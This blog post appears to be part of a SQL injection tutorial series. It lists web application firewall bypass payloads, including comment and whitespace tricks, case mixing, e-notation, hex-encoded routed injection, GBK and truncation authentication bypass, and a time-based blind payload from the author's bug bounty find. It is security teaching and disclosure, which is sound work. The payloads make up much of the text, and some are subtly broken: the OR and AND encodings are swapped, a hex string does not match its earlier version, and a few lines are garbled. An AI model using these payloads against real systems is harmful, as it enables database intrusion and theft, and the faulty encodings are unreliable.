AlbusSec:- Penetration-List 06 SQL Injection (SQLi) — Sample — 3
Hi Information Security folk, I hope you liked the previous article, We completed our Sql-Exploitation Section. However, in today’s article, we’ll learn about how we’ll encounter WAf. Means, We’ll learn the bypass technique. Firstly, I will introduce myself. So, I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco foundation of India, an Information Security Researcher, and the founder of Albus Security. Without further do, let’s get started.
- Using Space Alternative
- Using Comment
- Using Parentheses
- Case Sensitive
- Use different Operator
- Routed SQL Injection
- Advanced Authentication Bypass
- Real-World Example
Using Space Alternative:- We’ll use %09 or %0 instead of whitespace(%20) in the Malicious query.
1'%09AND%091=1%09%90--+ or 1' %0AND=1=1%0--+
Using Comment:- Using Comment Syntax instead of Whitespace in the malicious query.
1'/*test*/AND/**/1=1/**/ --+
Using Parentheses:- We can also use parentheses as 1'whitespace to bypass WAF.
(1)AND(1)=(1) --+
Case Sensitive:- Manipulation of words from uppercase to lowercase and lowercase to uppercase.
1' uNIoN SeLEcT AlL 1,2,3,dAtAbAsE() --+
1' AnD 1=1 --+
1 aNd SlEeP(10) --+
Use Different Operators:- You can also use different operators in your malicious query.
OR --> || --> %26%26
AND --> && --> %7C%7C
e Notation bypass:- e-notation also known as Scientific notation, has been introduced into many programming languages. Basically, E stands for Exponent. So, If you want to write a number of power, then you can use e notation.
Simple-Method:- 1¹
E-Notation-Method:- 1.e(1)
In 2018, GoSecure ethical hackers analyzed some presentations and started to do some tests with MYSQL and MariaDB locally, And they find out that the e notation vulnerability mentioned in some presentations had been really impactful. However, during an engagement, Gosecure found out that the rule of “SQL Database” in AWS WAF could be bypassed. let’s take an example, Whenever an attacker will send a simple query then WAF blocks the query.
https://albussecurity.com/index.php?id=1' and sleep(10) --+
WAF will block this query, But Whenever an attacker uses this same query with e notation syntax then it will be bypassed
https://albussecurity.com/index.php?id=1 AND 1.e(1) AND sleep(10) --+
That Time WAF wasn’t defending this and giving you access to the database.
Routed SQL Injection:-
Routed SQL Injection is a situation where the injectable query is not the one that gives the result, but the output of the injectable query goes to the other query which gives the output. Basically, In routed SQL injection is just like whenever you inject a query you’ll get nothing, or maybe the server will block you, therefore You’ll use hex to encode the value, But the hexed value will be attached to the first query value.
Query with hexed value:- ' AND sleep(10) — -+
0x2720414e4420736c65657028313029202d2d2b
The query that can be in plain text:- ' UNION SELECT ALL
Now Combine these queries into one
https://albussecurity.com/index.php?id=1' UNION SELECT ALL 0x2720414e4420736c655702831302902d2d2d
The server will not give you the result of the first query, but it will give the result of the second query that is decoded on hexed. Routed SQL Injection may sound a little bit hard for many beginners because Routerd SQL Injection is a new concept that confuses many cybersecurity beginners. However, If you solve some lab that is related to Routed-SQL-Injection then you’ll easily understand this.c
Advanced Authentication bypass:-
I already explain to you how we’ll bypass Authentication with the help of SQLi in my previous article. But with that technique there is no possibility to bypass Authentication with the help of SQLi, therefore We’ll learn about some advanced bypass tricks to bypass Authentication with the help of SQLi.
GBK Authentication bypass
Whenever We’ll try to bypass auth then You can use %A8%27or %8CA8%27 instead of '
https://albussecurity.com/student.php?id=1%A8%27AND 1=1 --+
SQL Truncation Bypass
SQL Truncation is a creepy bug in the database and the Exploitation of this issue leads to a user account being compromised by an attacker. First I’ll tell you how this bug occurs in the database. Suppose An user input value doesn’t get sanitized by the server for its length, then truncation flow arises, Let’s take an Example- An web application uses MYSQL in default mode, then a user account as Carlos, therefore database in each column is limited to 10 words, In Backend database with the default configuration, then MYSQL will truncate( deleted) longer strings because we defined a column length. Also If the user input value has space then it will be ignored during the comparison. However, if An attacker will register an account with a user account have 21 words like the “ Carlos hack” then an application will accept a new user account, also the application will ignore the hack and insert a user account as Carlos due to the 20-word column length, Basically, An application will truncate the username and insert as Carlos and ignored hack, So here we perform successfully truncation attack, And Overall result is that database will overwrite a user account and set the password that was given by the attacker, An attacker will successfully be registered and login as Carlos with the password that he enter on registration. I hope You understand SQL Truncation Bypass. I recommend You solve some CTF that is related to SQL Truncation Attack
Real-World-Example:-
Vulnerability: Database Access through Blind-SQL-Injection
Reward: $1300
Here I’ll tell you about my finding on the private program where I found “Database access through Blind-SQL-Injection”. Let’s call that program private.com, However, I spend almost 4 weeks in that program, On there I report lots of vulnerabilities, but they all were p4, and p3 vulnerabilities, therefore I just scroll js and Develop some hope that I get a unique URL, After Sometime I saw one Endpoint.
https://private.com/files?serialnumber=342
So As a hacker Mindset, I just applied SQL-Injection payload, Command Injection, XXE, and so on. but it doesn’t work on this because of WAF. therefore To execute all the things I had to inject an advanced payload on it. therefore I made the best payload for this.
https://private.com/files?serialnumber=1',"),/*test*/%26%26%09sLeEp(30) --+
Whenever I send this request to the server, then the server will wait for 30 seconds, Yes it’s really happened. So Simply I just used the advanced sqlmap command to extract information from the database. Boom I got access to the database, Mean I’m eligible to extract data from the database.
Then I reported this vulnerability to the company, and within 2 hours they replied to me that They will fix a meeting with their security team and discuss the issues and as soon as possible they will revert back to me. However, Within 2 weeks I got a bounty from that company. Also, they fixed this vulnerability.
Finally, We’ve Completed Our SQL-Injection Section. But here is an Update for Everyone, I’ll upload topics as a sample on medium, not a proper section because I’ve started to make a book that’s why I’ll not upload the whole things on medium. Now Upcoming writeups will be uploaded as a sample. Thank You For Reading
You can download a sample of the book
